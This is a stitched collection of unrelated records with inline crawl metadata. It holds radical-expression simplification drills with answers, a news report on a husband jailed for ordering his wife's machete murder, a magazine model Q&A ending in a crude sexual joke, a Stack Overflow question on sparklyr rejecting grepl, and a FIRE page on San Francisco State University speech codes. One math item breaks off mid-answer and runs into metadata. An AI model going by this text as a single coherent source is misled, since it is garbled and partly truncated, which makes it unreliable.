Simplify -6*(sqrt(500)*1*-4 + sqrt(500) + sqrt(500))*5.
600*sqrt(5)
Simplify -4*sqrt(14)/(sqrt(6)/sqrt(3)).
-4*sqrt(7)
Simplify (sqrt(50)/(2*sqrt(10)))**2 - (sqrt(5) - (sqrt(60)/sqrt(3) - sqrt(20))**2).
-sqrt(5) + 5/4
Simplify (((sqrt(126) - (sqrt(126) - (sqrt(126) + (sqrt(126)*-1 - sqrt(126))))) + sqrt(126))/sqrt(7))/(sqrt(108)/(sqrt(300) - sqrt(12) - sqrt(12)) - sqrt(9)).
0
Simplify (sqrt(475) - (sqrt(475) + sqrt(475)*-2))**2*5.
9500
Simplify -4*((sqrt(152) + sqrt(152)*3)/sqrt(8))**2.
-1216
Simplify sqrt(6)/(sqrt(3)*-2) - 5*1*sqrt(2).
-11*sqrt(2)/2
Simplify (0 + sqrt(27) + sqrt(3) + sqrt(192) + 1)**2.
24*sqrt(3) + 433
Simplify 5*sqrt(119)/(sqrt(7)*-3 - sqrt(7)).
-5*sqrt(17)/4
Simplify 3*(3*sqrt(432)*-5)**2.
291600
Simplify ((sqrt(2) - (sqrt(20) - -5*sqrt(20))/sqrt(10)) + -4)**2.
40*sqrt(2) + 66
Simplify ((2*sqrt(228)*-4)/sqrt(12))**2.
1216
Simplify ((sqrt(1573) - ((sqrt(1573) - (sqrt(1573) + -1)) + -2))*-3)**2.
198*sqrt | mini_pile | {'original_id': '9cc4632fc780bfe8d8743085de3399a6e236dab04bc9de076d638d49ab6e9fad'} |
Husband is jailed for ordering machete murder
Harpeet Aulakh, 32, convicted of ordering two men to murder his wife as she walked to collect children
Geeta Aulakh murder
Geeta Aulakh was found dying on the street after a brutal machete attack. Her husband has been jailed for ordering her murder. Photograph: Metropolitan Police/PA
A man was jailed for at least 28 years today for ordering the murder of his estranged wife, who was hacked to death with a machete in a suburban street as she walked to collect the couple's children.
Harpreet Aulakh, 32, an Indian-born Sikh, arranged the murder after becoming obsessed with the idea he had lost respect among his peers because his wife, Geeta, from a middle-class British Hindu family, had left him and was seeking a divorce.
His 28-year-old wife, a receptionist at a community radio station, was ambushed after work on November 16 last year as she walked the few hundred metres from a bus stop in Greenford, west London, to collect the couple's two young sons from their childminder.
She was attacked on a street corner with a 14-inch machete and suffered appalling injuries to her head and body.
Her right hand was severed as she tried to defend herself.
Also jailed for murder at the Old Bailey was Sher Singh, 19, who wielded the machete under Aulakh's instructions and Jaswant Dhillon, 30, who acted as a look-out. Both received minimum sentences of 22 years.
Jurors were unable to agree a verdict on 20-year-old Harpreet Singh, of Slough, Berkshire, who was alleged to have been the driver. He denies murder and will now face a retrial.
Mr Justice Saunders said: "It was a pointless, cold-blooded killing of a woman about whom no one except Aulakh had a bad word to say."
Sentencing Aulakh to life in prison with a minimum tariff of 28 years, he said: "His reason for wanting Geeta dead was that she had made it clear to him that she was determined to divorce him and he was not prepared to accept that and he was prepared to kill her to prevent it happening. The family has lost a sister and daughter but most importantly the two children have lost a mother."
Aulakh insisted his innocence throughout, pointing to CCTV footage of him drinking in a west London pub at the time of the murder. But the court heard he had carefully planned the killing, at one point offering a group of friends £5,000 to "do a job" for him.
Sher Singh was, police discovered, a naive teenager who came to the UK from India only four months before the killing on a bogus student visa arranged by Aulkah, a petty criminal involved in drugs and immigration scams.
The machete used in the killing, recovered from a canal, was traced to a shop near Aulakh's home. CCTV footage from the store showed him purchasing it just days before the murder.
The court heard he had met his future wife – described as hard-working and honest – at a bus stop in Hounslow when she was a teenager, but her family disapproved of the relationship. They eloped to Belgium and the Netherlands, getting married and starting a family, before returning to the UK.
Aulkah proved an abusive and feckless husband and after a period of separation his wife began divorce proceedings in September last year.
This was the final straw for Aulakh, who had become obsessed with the idea his wife was seeing another man, according to Aftab Jafferjee QC, prosecuting. He added: "Geeta Aulakh was in the process of divorcing him and that would not be tolerated." | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '0', 'language_id_whole_page_fasttext': "{'en': 0.9911317229270936}", 'metadata': "{'Content-Length': '236708', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:ES2R4XTSJ6EELC4GEQ7QXHZDVBX3MZHV', 'WARC-Concurrent-To': '<urn:uuid:639b1f6f-8cc8-4c21-b744-e432e5bbd939>', 'WARC-Date': datetime.datetime(2015, 2, 28, 19, 38, 17), 'WARC-IP-Address': '23.235.46.207', 'WARC-Identified-Payload-Type': None, 'WARC-Payload-Digest': 'sha1:NQMS2V27TDC5EVE3IXTXPOQARRIHKYJG', 'WARC-Record-ID': '<urn:uuid:fc900cae-1b22-4cd4-a31e-bbaec112084e>', 'WARC-Target-URI': 'http://www.theguardian.com/uk/2010/dec/03/husband-jailed-machete-murder', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:8c1ab035-316f-4667-b4af-629f4eab4469>', 'WARC-Truncated': None}", 'previous_word_count': '599', 'url': 'http://www.theguardian.com/uk/2010/dec/03/husband-jailed-machete-murder', 'warcinfo': 'robots: classic\r\nhostname: ip-10-28-5-156.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2015-11\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web with URLs provided by Blekko for February 2015\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.07987332344055176', 'original_id': 'ff2ed8a58a259146d8cee754bf857703552685daf16fe94dfd8d23d0b8c577f8'} |
User menu
Main menu
Jennifer's Q & A
Who's your favorite sports team, and why?
My favorite sports team is the Oakland raiders. I know they aren't the best team in the nfl, but I stand by them. I was a cheerleader for the Oakland raiderettes in 2009 & that's where I especially grew to love the team & the fans.
What's your favorite movie quote?
X box dance central. & yes I could probably kick your butts at it :)
Piercings/Tattoos (How many? Where?)
Piercings: 2 on each earlobe, 1 on each trigis, & my tongue Tattoos: 1 on my ankle of plumeria flower & "kulia I ka nu'u" & one on my forearm saying "c'est la vie"
What's the most embarrassing song on your iPod?
To be honest, my computer crashed & I got a new iPhone so I actually have no songs on my iPod. Buuuuut if it were to be anything it would probably be an old Christina aguilara song.
What's your best party trick?
Not much of a party trick kind of person, but I love to do keg handstands lol
What's the most memorable pick-up line you've ever heard?
Most of them I've heard are always horrible & I end up walking away from the guy so I never really remember them. Just the fact that they were really dumb
What's the worst job you've ever had?
The worst job I ever had was when I was 17 & I worked at a soul food restaurant in my hometown.
What's the most dangerous thing you've ever done?
I'd have to say when I was younger I was a lot more dangerous until I hurt myself dirt bike riding. Now I definitely think of the outcome before I try anything dangerous lol
My guilty pleasure....McDonald's!! Lol
What's the strangest thing in your fridge right now?
An artichoke, because I never eat them but wanted to cook it one day. I still have yet to do that. It's probably gone bad now lol
What's the naughtiest thing you've ever done in public? down and dirty at a children's playground
What do you feel sexiest wearing?
Sexy lingerie duh! Preferrably red or black maybe a print of both colors combined. & sexy stilettos ;)
Tell us a joke.
A mother is making a cake for her three sons when she accidentaly dropps some BB from the shelf into the batter. She decides that it won't matter and continues to make the cake. Later that day, her sons eat the cake and don't even notice the BBs. The next day, when the mother is reading a magazine on the couch, one of her sons runs in saying, ''Mom, mom, I pissed out a beebee!'' She says ''That's okay, son. I accidentaly dropped some beebees into the cake batter. You'll be fine.'' Five minutes later, one of the other sons, come running in and he says, ''Mom, mom, I-'' but the mother cuts him off and she says, ''I know, I know, you pissed out a beebee. I dropped it into the cake batter, but you'll be fine.'' Then her last son runs in the room, and he says, ''Mom, mom, I-'' and the mother cuts him off and says, ''I know, I know, you pissed out a beebee. It's my fault for dropping it in the cake batter, but you'll be fine.'' But then son says, ''No, no, I was masturbating and I shot the dog!" | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '27', 'language_id_whole_page_fasttext': "{'en': 0.9671197533607484}", 'metadata': "{'Content-Length': '80253', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:KKZGJEIL2LALLSSU3A2JOZTGXGYPAC4X', 'WARC-Concurrent-To': '<urn:uuid:fa9072cf-9a66-4ef0-8453-1d7dd682dea1>', 'WARC-Date': datetime.datetime(2014, 8, 2, 5, 51, 54), 'WARC-IP-Address': '23.34.116.77', 'WARC-Identified-Payload-Type': None, 'WARC-Payload-Digest': 'sha1:3J4MNKIJIF56ZZ36OBOVMZFJRRNGKUCD', 'WARC-Record-ID': '<urn:uuid:21435730-046b-4ab7-a804-29f47eb0bbee>', 'WARC-Target-URI': 'http://www.maxim.com/hometown-hotties/jennifer-sunnyvale-ca?page=4', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:d94e5c2f-49ed-4e1e-8af9-b796dab1273a>', 'WARC-Truncated': None}", 'previous_word_count': '606', 'url': 'http://www.maxim.com/hometown-hotties/jennifer-sunnyvale-ca?page=4', 'warcinfo': 'robots: classic\r\nhostname: ip-10-146-231-18.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2014-23\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web with URLs provided by Blekko for July 2014\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.045099079608917236', 'original_id': 'ae7a3a5d82f14dc4ba3c906c3413499ff8c6b10c0da540969c5f9419548a07c3'} |
Q:
is it possible to use native R code or other R package functions with sparklyr?
I've gotten to the point where I can follow along with the example here (with only the slight modification of adding config=list() to the input arguments).
sc <- spark_connect(master = "yarn-client", config=list())
library(dplyr)
flights_tbl <- copy_to(sc, nycflights13::flights, "flights")
flights_tbl %>% filter(dep_delay == 2)
Source: query [?? x 16]
Database: spark connection master=yarn-client app=sparklyr local=FALSE
year month day dep_time dep_delay arr_time arr_delay carrier tailnum flight origin dest air_time distance hour minute
<int> <int> <int> <int> <dbl> <int> <dbl> <chr> <chr> <int> <chr> <chr> <dbl> <dbl> <dbl> <dbl>
1 2013 1 1 517 2 830 11 "UA" "N14228" 1545 "EWR" "IAH" 227 1400 5 17
2 2013 1 1 542 2 923 33 "AA" "N619AA" 1141 "JFK" "MIA" 160 1089 5 42
3 2013 1 1 702 2 1058 44 "B6" "N779JB" 671 "JFK" "LAX" 381 2475 7 2
4 2013 1 1 715 2 911 21 "UA" "N841UA" 544 "EWR" "ORD" 156 719 7 15
5 2013 1 1 752 2 1025 -4 "UA" "N511UA" 477 "LGA" "DEN" 249 1620 7 52
6 2013 1 1 917 2 1206 -5 "B6" "N568JB" 41 "JFK" "MCO" 145 944 9 17
7 2013 1 1 932 2 1219 -6 "VX" "N641VA" 251 "JFK" "LAS" 324 2248 9 32
8 2013 1 1 1028 2 1350 11 "UA" "N76508" 1004 "LGA" "IAH" 237 1416 10 28
9 2013 1 1 1042 2 1325 -1 "B6" "N529JB" 31 "JFK" "MCO" 142 944 10 42
10 2013 1 1 1231 2 1523 -6 "UA" "N402UA" 428 "EWR" "FLL" 156 1065 12 31
# ... with more rows
However, when I try to use other R functions like one might do with dplyr things go awry:
flights_tbl %>% filter(dep_delay == 2 & grepl("A$", tailnum))
Source: query [?? x 16]
Database: spark connection master=yarn-client app=sparklyr local=FALSE
Error: org.apache.spark.sql.AnalysisException: undefined function GREPL; line 4 pos 41
at org.apache.spark.sql.hive.HiveFunctionRegistry$$anonfun$lookupFunction$2$$anonfun$1.apply(hiveUDFs.scala:69)
at org.apache.spark.sql.hive.HiveFunctionRegistry$$anonfun$lookupFunction$2$$anonfun$1.apply(hiveUDFs.scala:69)
at scala.Option.getOrElse(Option.scala:120)
at org.apache.spark.sql.hive.HiveFunctionRegistry$$anonfun$lookupFunction$2.apply(hiveUDFs.scala:68)
at org.apache.spark.sql.hive.HiveFunctionRegistry$$anonfun$lookupFunction$2.apply(hiveUDFs.scala:64)
at scala.util.Try.getOrElse(Try.scala:77)
at org.apache.spark.sql.hive.HiveFunctionRegistry.lookupFunction(hiveUDFs.scala:64)
at org.apache.spark.sql.catalyst.analysis.Analyzer$ResolveFunctions$$anonfun$apply$12$$anonfun$applyOrElse$5$$anonfun$applyOrElse$24.apply(Analyzer.scala:574)
at org.apache.spark.sql.catalyst.analysis.Analyzer$ResolveFunctions$$anonfun$apply$12$$anonfun$applyOrElse$5$$anonfun$applyOrElse$24.apply(Analyzer.
Obviously grepl is not supported. My question is: is there a way to use base R or R package functions? If not is it coming? It seems that work along these lines is progressing with dapply and gapply in SparkR v2, but it would be great if it worked with sparklyr.
A:
Just saw this issue for sparklyr. Short answer is "not yet". Looking forward to future versions where this functionality is added.
| mini_pile | {'original_id': '0fd0975c1a3af2a7416277c01b7c1b0b883acbd8e47c58f617fe9d527c6c9d15'} |
San Francisco State University has been given the speech code rating Yellow. Yellow light colleges and universities are those institutions with at least one ambiguous policy that too easily encourages administrative abuse and arbitrary application. Read more here.
SFSU put its College Republicans on trial before a campus tribunal (see more here) for stepping on makeshift Hamas and Hezbollah flags during an anti-terrorism rally. The College Republicans claimed that SFSU’s speech codes were facially invalid, and with the help of the Alliance Defense Fund and the support of FIRE’s Speech Code Litigation Project, sued the university. The lawsuit ultimately resulted in an injunction against SFSU, effectively striking down unconstitutional speech codes across the entire California State University system.
The College Republicans at San Francisco State University held an anti-terrorism protest against Hezbollah and Hamas by stomping on homemade replicas of those organizations’ flags. Unbeknownst to the students, the flags of the two organizations contain the word “Allah” in Arabic script. Another student complained, alleging “acts of incivility,” “intimidation,” and the creation of a “hostile environment.” The school responded by instituting disciplinary action against the College Republicans. After FIRE intervened, the college ended the investigation and decided not to punish the students involved. However, the incident led to litigation over SFSU’s speech codes, which is detailed here.
Harassment means unwelcome conduct engaged in because of a Protected Status and:
Submission to, or rejection of, the conduct is made a term or condition of the Complainant’s employment; or
Submission to or rejection of such conduct by the Complainant is used as the basis or threatened to be used as the basis for employment actions or decisions affecting the Complainant; or
The conduct is sufficiently severe or pervasive that its effect, whether or not intended, could be considered by a reasonable person in the shoes of the Complainant, and is in fact considered by the Complainant, as intimidating, hostile or offensive.
Sexual Harassment, a form of Sex Discrimination, is unwelcome verbal, nonverbal or physical conduct of a sexual nature that includes, but is not limited to Sexual Violence, sexual advances, requests for sexual favors, and indecent exposure where:
Submission to, or rejection of, the conduct is explicitly or implicitly used as the basis for any decision affecting a Student’s academic status or progress, or access to benefits and services, honors, programs, or activities available at or through the University; or
Such conduct is sufficiently severe, persistent or pervasive that its effect, whether or not intended, could be considered by a reasonable person in the shoes of the Student, and is in fact considered by the Student, as limiting the Student’s ability to participate in or benefit from the services, activities or opportunities offered by the University; or
Such conduct is sufficiently severe, persistent or pervasive that its effect, whether or not intended, could be considered by a reasonable person in the shoes of the Student, and is in fact considered by the Student, as intimidating, hostile or offensive.
Sexual Harassment also includes acts of verbal, non-verbal or physical aggression, intimidation or hostility based on gender or sex-stereotyping, even if those acts do not involve conduct of a sexual nature.
Students are expected to be good citizens and to engage in responsible behaviors that reflect well upon their university, to be civil to one another and to others in the campus community, and contribute positively to student and university life.
The University actively promotes free expression and the exchange of ideas, perspectives and viewpoints. Within the context of this policy, free speech activity includes, but is not limited to the following: pure or symbolic speech, assembly, meeting, demonstrations or rallies, picketing, petitioning, mime and theater, music and singing, and religious or political expression. … There shall be no restrictions on legally-protected free speech activity based on the content of such speech or expression or on the political, religious, or other affiliations of speakers. Speech activity not protected by the U.S. Constitution or by this policy includes defamation, obscenity, terrorist threats, false advertising, and the promotion of actual or imminent violence or harm.
…
Spontaneous events occasioned by news or issues coming into public knowledge may be held on campus without advance permission so long as they adhere to all University policies and the restrictions outlined above ….
by Robert Shibley The Daily Caller I’m not a big believer in the “war on Christmas” rhetoric that we often hear around this time of year. In a religiously diverse and pluralistic society like ours, politicians, corporations, and other institutions are naturally going to adjust the way they express themselves in order to avoid offending their constituents or customers. But every so often in my work at the Foundation for Individual Rights in Education (FIRE), I see an example of seasonal political correctness so ridiculous that it makes me want to put my head down on my desk. Such is the […]
On Tuesday, I shared the first half of my list of ten of the most common free speech violations which the Foundation for Individual Rights in Education (FIRE ) encounters in its work defending campus expression. As I noted yesterday, the list is far from comprehensive, and the offenses listed are in no particular order. They do, however, give a sense of the depth and variety of ways free speech is threatened at our colleges and universities. Here are five more of the most common violations against free speech on campus. Be sure to visit yesterday’s post for the first half of […]
A federal judge has ordered that the speech policies for all 28 schools in the California State University system be suspended or limited while a First Amendment challenge works its way through the courts. U.S. Magistrate Judge Wayne Brazil issued the preliminary injunction Oct. 31, saying that the policy contains serious constitutional problems. A written order on the matter was still pending at press time. “The university is supposed to be the ‘marketplace of ideas,’ but these speech codes, with few exceptions, are selectively applied against Christian and conservative students,” said David Hacker, staff counsel for Alliance Defense Fund, which […]
A federal magistrate said he will temporarily bar San Francisco State University and the 22 other California State University system campuses from enforcing certain provisions of the student conduct code that he ruled could be used to punish students for Constitutionally protected speech. The policies were challenged in a lawsuit by the College Republicans of San Francisco State. Members of the group were investigated for inciting violence, creating a hostile environment and engaging in “actions of incivility” stemming from an incident in which members stepped on Hamas and Hezbollah flags during an anti-terrorism rally. The allegations against the group were […]
In a decision hailed as a victory for free speech, a federal judge ordered San Francisco State University and the California State University system to stop enforcing speech codes used to prosecute students for the “desecration” of flags used by terrorist groups. U.S. Magistrate Judge Wayne Brazil issued a preliminary injunction to bar the schools from enforcing several policies challenged in a lawsuit. One required students to act in accordance with SFSU “goals, principles, and policies” and another, a CSU system-wide policy, called for students “to be civil to one another.” “This decision is a vital step in the fight […]
For a number of years, the Philadelphia-based Foundation for Individual Rights in Education (FIRE) has been successfully waging a war on college speech codes the organization claims run afoul of protected free speech rights. The organization has won pivotal victories against Shippensburg University in Pennsylvania, Texas Tech University, the State University of New York at Brockport and California’s Citrus College. Now, San Francisco State University (SFSU) is squarely within FIRE’s crosshairs. With the assistance of the Alliance Defense Fund, a leading Christian public interest law firm, FIRE has sued SFSU claiming that the university’s policies violated the First Amendment rights […]
Most Americans know that burning our nation’s flag is protected by the First Amendment. No matter how distasteful to some, the Supreme Court has consistently held flag-burning to be protected as expressive political conduct. So if burning an American flag is protected speech, burning other flags—say, the flags of political parties considered to be terrorist groups by our government—would also be protected speech, right? Right—except at San Francisco State University (SFSU), where the First Amendment takes a backseat to Hamas and Hezbollah. As part of an anti-terrorism rally held on campus last October, SFSU’s College Republicans stepped on […]
by Jacob Sullum Reason Online College Republicans at San Francisco State University recently filed a federal lawsuit challenging the speech restrictions that led to a five-month investigation of the group after an anti-terrorism rally last October. Participants in the rally stepped on paper facsimiles of the Hamas and Hezbollah flags in a deliberate counterpoint to similar treatment of the U.S. flag by members of those groups. Afterward a student complained that the College Republicans had “incited violence,” created a “hostile environment,” and engaged in “actions of incivility.” Although both the ACLU and the Foundation for Individual Rights in Education […]
San Francisco State University is being sued for allegedly violating the rights of students who stomped on Hamas and Hezbollah flags during an anti-terrorism rally. The Alliance Defense Fund and the Foundation for Individual Rights in Education—also called FIRE—have filed the suit in federal court on behalf of the College Republicans club and two individual students. The lawsuit contends the school conducted an illegal investigation into the flag stomping incident. FIRE says it wrote to the school president twice to stress that a public university is not permitted to prosecute students for engaging in a peaceful protest or desecrating any […]
A lawsuit filed by the Alliance Defense Fund is targeting the speech codes imposed on students by the university system in California after several students were prosecuted for the “desecration” of flags used by terrorist groups. “America’s colleges and universities should recognize the constitutional rights of Christian and politically conservative students just as they do for all other students,” said David French, senior legal counsel for the ADF and chief of the ADF Center for Academic Freedom. “Officials at San Francisco State are required to respect the U.S. Constitution, which protects the right to free speech in exactly these kinds […]
San Francisco State University was sued yesterday for allegedly violating students’ right to free speech when it investigated an incident during which students stomped on flags bearing the name of Allah. The Alliance Defense Fund, in cooperation with the Foundation for Individual Rights in Education, filed the federal lawsuit on behalf of the plaintiffs—the College Republicans club and members Trent Downes and Leigh Wolf. FIRE’s Speech Codes Litigation Project worked to coordinate the suit but does not represent the plaintiffs. The lawsuit charges the university with having violated the plaintiffs’ First Amendment rights by dragging them through a five-month investigation […]
by Associated Press International Herald Tribune San Francisco State University was sued for allegedly violating students’ right to free speech when it investigated an incident during which students stomped on flags bearing the name of Allah. The Alliance Defense Fund and the Foundation for Individual Rights in Education (FIRE) filed the federal lawsuit on behalf of the plaintiffs—the College Republicans club and two of its members. The case charges the university with having violated the plaintiffs’ First Amendment rights by dragging them through a five-month investigation and campus tribunal after they stepped on Hamas and Hezbollah flags during an anti-terrorism […]
The College Republicans at San Francisco State University sued it today for alleged violations of the group’s First Amendment rights. As part of an anti-terrorism rally at San Francisco State last year, members of the political group’s campus chapter stomped on makeshift flags of Hamas and Hezbollah, which the U.S. government considers terrorist organizations. (Both flags include Arabic script spelling the word “Allah,” but the lawsuit says the plaintiffs did not know that.) The university investigated the College Republicans and conducted a disciplinary hearing, though ultimately it found no violation of its code of student conduct. The lawsuit—filed on behalf […]
The College Republicans at San Francisco State University recently found themselves under investigation for the offenses of flag desecration and blasphemy. While the disciplinary proceedings ended late last month with a decision not to punish the student group, the investigation itself points to a troubling trend. The alleged blasphemy was directed at Islam, and the desecrated flag contained no stars or stripes. At a small anti-terrorism rally in October 2006, several members of the College Republicans stomped on pieces of paper they had painted to look like flags of the radical Islamic organizations Hezbollah and Hamas, copying the designs from […]
San Francisco State University’s College Republicans will not face sanctions after hosting a rally during which students stepped on pieces of paper they had painted to resemble the Hezbollah and Hamas flags. The anti-terrorism demonstration on Oct. 17, 2006, prompted another student to file a complaint because the flags contain the Arabic word for “Allah.” The complaint alleged that the Republicans had attempted to “incite violence and create a hostile environment.” SFSU administrators held a hearing to evaluate the charges, which could have resulted in sanctions to force the group to apologize or even remove their organization from campus. The […]
College Republicans at San Francisco State University held an anti-terrorism rally last October during which they stepped on pieces of paper painted to resemble the flags of the terror groups Hamas and Hezbollah. Another student filed a formal complaint accusing the Republican group of attempting to incite violence and creating a hostile environment. The school took it seriously enough to schedule a formal hearing. The students’ rights group called the Foundation for Individual Rights in Education said the hearing was illegal—contending a public institution cannot prosecute students for political protests. The hearing was held—and the College Republicans were exonerated. University […]
After months of pressure, San Francisco State University has decided not to punish College Republicans it charged with desecrating the name of Allah by stepping on makeshift Hezbollah and Hamas flags at an anti-terrorism rally. Led by the non-profit advocacy group Foundation for Individual Rights in Education, the public and some media outlets had called on the school to “uphold the students’ constitutionally guaranteed right to free expression. “We are relieved that SFSU has come to its senses and recognized that it cannot punish students for constitutionally protected expression,” FIRE President Greg Lukianoff said. “But the fact remains that the […]
The SF State College Republicans will not face sanctions for allegedly breaking the student code of conduct when they stepped on homemade flags with the Arabic symbol for Allah. The Student Organization Hearing Panel, or SOHP, unanimously ruled Friday that there were no grounds to punish the club for “inciting violence and of actions of incivility” for its members’ actions during an anti-terrorism rally Oct. 17, 2006. Also, Associated Students Inc. abruptly rescinded their Nov. 15, 2006 resolution condemning the College GOPs by unanimous vote last Wednesday. Though ASI President Maire’ Fowler was originally a strong proponent of condemning the […]
San Francisco University is investigating its College Republicans for hosting an anti-terrorism rally on campus in which participants stepped on makeshift Hezbollah and Hamas flags. Several Muslims students filed a complaint arguing they were offended because the flags bore the word “Allah” and the actions were intended to incite and create a hostile environment. Yet desecrating a flag—even burning an American flag however distasteful this act may be—is an expression protected by the First Amendment as recent Court cases have suggested and cannot be punished at a public university. Robert Shibley, president of the Foundation for Individual Rights in Education […]
by Joe Murray The Evening Bulletin Ever since the sit-ins of the ‘60s, one thing has been painstakingly clear for many a college campus. Universities are the incubators of free speech activity and the soapbox of choice for those cultural revolutionaries lobbying for unpopular, if not controversial, ideas. During the flower power days of academia, Hanoi Jane embodied the counter culture and its cause was a struggle against U.S. cultural imperialism aboard. To the Woodstock warrior, Jim Crowe was public enemy No. 1 and the war in Vietnam was not only a bad decision, but also an immoral one to […]
In 1989, the Supreme Court handed down its decision in Texas v. Johnson declaring it a constitutional right for individuals to burn the American flag in political protest. The Court wrote: …recognizing the communicative nature of conduct relating to flags. Attaching a peace sign to the flag, refusing to salute the flag, and displaying a red flag…may find shelter under the First Amendment. The Supreme Court ruled that such actions in the context of a political protest are expressive political speech protected by the free speech clause of the First Amendment. This is the state of First Amendment law. Burning […]
When “Obsession: Radical Islam’s War Against the West,” a documentary that shows Muslims urging attacks on the United States and Europe, was screened recently at the University of California, Los Angeles, it drew an audience of more than 300 — and also dozens of protesters. At Pace University in New York, administrators pressured the Jewish student organization Hillel to cancel a showing in November, arguing it could spur hate crimes against Muslim students. A Jewish group at the State University of New York at Stony Brook also canceled the film last semester. The documentary has become the latest flashpoint in […]
by Jason Rantz Family Security Matters A dangerous trend is brewing on our college campuses, and it’s empowering our enemies. As bastions of far left political thought, college campuses are doing what they can to give soap boxes to students and professors who are against the War on Terror, while silencing anyone on campus who dares to support our efforts to defeat our enemies. Take, for example, recent events at San Francisco State University (SFSU), where the Foundation for Individual Rights in Education (FIRE) reports on a frightening disrespect for free speech: …San Francisco State University (SFSU) is investigating its […]
A state university in California is weighing punishment for students who disrespected a flag. Not the American flag, of course. The College Republicans at San Francisco State University are in hot water for stomping on the flags of the terrorist groups Hamas and Hezbollah during an October “anti-terrorism rally.” Little did they know, the flags bear the name of Allah in Arabic script—the trampling of which is a grave offense to Islam. The university is currently weighing whether to punish the students even though they couldn’t have known. It is expected to hold a disciplinary hearing in the coming weeks. […]
What is San Francisco State University teaching that makes student leaders think that if they don’t like what other students say, they can use student organizations to stifle those with dissenting views? Do they even know about the First Amendment? This story starts with an “anti-terrorism rally” held last October on campus by the College Republicans. To emphasize their point, students stomped on Hezbollah and Hamas flags. According to the college paper, the Golden Gate (X)Press, members of Students Against War and the International Socialist Organization showed up to call the Republicans “racists,” while the president of the General Union […]
It’s all well and good to desecrate a flag these days—as long as it’s an American flag. If the flag represents, say, a terrorist organization such as Hamas, then you could find yourself in trouble. The Foundation for Individual Rights in Education performs an estimable service by defending free speech on college campuses. It doesn’t choose sides, defending only the speech it likes or agrees with. FIRE has defended individuals from across the ideological spectrum. In the current case, it’s sticking up for a group of College Republicans at San Francisco State University (SFSU) who held an anti-terrorism rally at […]
Giving new meaning to the worn campus quip that nothing is to be believed until the public affairs office officially denies it, San Francisco State University’s campus spokesperson, Ellen Griffin, has taken issue with my depiction of the Jihad at SFSU. What has vexed Ms. Griffin in her capacity as official apologist for a campus that enshrines and defends the anti-American left is my characterization of events that occurred at the campus on November 1, 2004 and November 3, 2004. In my Chronwatch article (November 30, 2004) on the reaction in academia to waking up to the Bush […]
One needs only to flip five pages into the University of Pittsburgh’s Student Code of Conduct and Judicial Procedures to find “The Pitt Promise: A Commitment to Civility” (the “Pitt Promise,” or “the Promise”)—a list of pedagogical principles and values to which students are expected to adhere. In principle, the pledge is morally sound and perhaps desirable, but, as FIRE has explained, mandating civility clauses infringes on students’ First Amendment rights. As a current student at the University of Pittsburgh, a public institution of higher education that is bound by the Constitution, it concerns me that the university has enacted a policy that so clearly infringes on its students’ rights.
Earlier this week, an article in The Chronicle of Higher Education (subscription required) discussed the growing popularity on college campuses of programs aimed at promoting civility. While one might reasonably ask whether there is a connection between exorbitant tuition rates, administrative bloat, and programs such as the “transformational, saturation approach” civility projects discussed in the article, there is no problem from an individual rights standpoint with colleges promoting civility. The individual rights problem, which the article barely even hints at, is that a large number of colleges and universities actually compel civility rather than simply encouraging it. The article focuses […]
Five years ago this month, FIRE first publicized a case at San Francisco State University (SFSU) that ignited public attention and eventually led to a significant legal victory for student rights. In October 2006, the College Republicans at San Francisco State University held an anti-terrorism rally on campus, during which they stepped on makeshift Hezbollah and Hamas flags. In response, several students filed complaints with the school, protesting that they were offended because the flags bore the word “Allah” (written in Arabic), a fact unknown to the College Republicans. Rather than defend the constitutional rights of its students to peaceably […]
Last week in The Christian Post, Alliance Defense Fund (ADF) Legal Counsel David J. Hacker took aim at an August 5, 2010, article titled “Rude Democracy” in Inside Higher Ed, written by Susan Herbst. Herbst discusses the perceived lack of civility in contemporary American discourse, both in the larger society and on university campuses, and argues that one solution to the problem as presented on campus is to maintain and enforce civility policies regulating student expression. Herbst writes that civility policies should play a major role in how universities counsel their students to behave on campus and should be used more prominently […]
Sam reported last week that San Francisco State University (SFSU) has revised its “Use of Buildings and Grounds” policy, which previously limited campus demonstrations and other expressive activities, such as distributing literature, to specified free speech zones. SFSU’s revised policy allows students to distribute literature anywhere in the university’s outdoor spaces so long as pedestrian traffic is unimpeded. As for rallies and demonstrations, the revised policy does not specify any free speech zones, and allows for spontaneous events “occasioned by news or issues coming into public knowledge” as an exception to its requirement for advanced reservation for outdoor student events. […]
There is good news for students at San Francisco State University: pursuant to the university’s revised policy on the Use of Buildings and Grounds, demonstrations and other expressive activities are no longer restricted to free speech zones. Under the old policy, “rallies and demonstrations” at SFSU—a university of more than 30,000 students—were restricted to “Public Forum Areas (i.e., Student Union Plaza Area).” Similarly, the distribution of literature was restricted to “the Student Union Plaza behind the blue lines marked on the pavement.” The revised policy contains no such restrictions. Now, “[d]istribution of literature may occur in University outdoor areas as […]
FIRE’s newest Justice Robert H. Jackson Legal Fellow is Erica Goldberg. Erica is a graduate of Tufts University, where she was editor-in-chief of Tufts’ weekly newspaper, and of Stanford Law School, where she was a member of the moot court board. She also served as a law clerk to the Honorable Ronald L. Gilman on the Court of Appeals for the Sixth Circuit, where she was confronted with various deprivations of freedom of expression. Before becoming a Robert H. Jackson fellow, Erica worked for two years as an appellate attorney at Latham & Watkins in Washington D.C. and then as […]
